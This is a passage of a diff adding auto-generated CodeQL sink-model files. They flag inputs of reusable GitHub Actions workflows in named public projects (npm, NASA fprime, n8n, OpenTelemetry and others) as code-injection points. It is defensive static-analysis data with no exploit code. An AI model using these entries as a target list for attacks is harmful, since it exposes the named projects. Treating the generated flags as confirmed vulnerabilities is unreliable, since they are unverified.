["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 00000000000..6107ae0e57c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 00000000000..74e0182cc4f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 00000000000..4bbd06a86f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 00000000000..59bdab8f39b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 00000000000..6988e25d41c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 00000000000..3c025f59b78 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 00000000000..5de0d170d40 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 00000000000..19d38d1241d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 00000000000..b1c787677a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 00000000000..249c734f55b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 00000000000..46951b5436d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 00000000000..cd1d0f318ef --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 00000000000..4055874a790 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 00000000000..bccd7271b08 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 00000000000..56528159143 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 00000000000..c4a9b07ed99 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 00000000000..db4f26083a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 00000000000..c12a079e2e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 00000000000..3b7122a7a13 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 00000000000..3e80edaaaff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 00000000000..99717acf024 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 00000000000..d9a066c2b22 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 00000000000..83e68740ac0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 00000000000..45f05ea8826 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 00000000000..1cd25da918f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 00000000000..2d5a077f1f4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 00000000000..98571dfc5d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 00000000000..8cbd1927fe0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 00000000000..6d3466f0927 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 00000000000..c7178a298ef --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 00000000000..08feb2033ff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 00000000000..3483cc13b9e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 00000000000..45350e121a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 00000000000..9665157b3ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 00000000000..9ef65a67c03 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 00000000000..eade5ecdae1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml new file mode 100644 index 00000000000..1478244cc9c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "inputs.language", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.org", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml new file mode 100644 index 00000000000..8bb0915294c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - 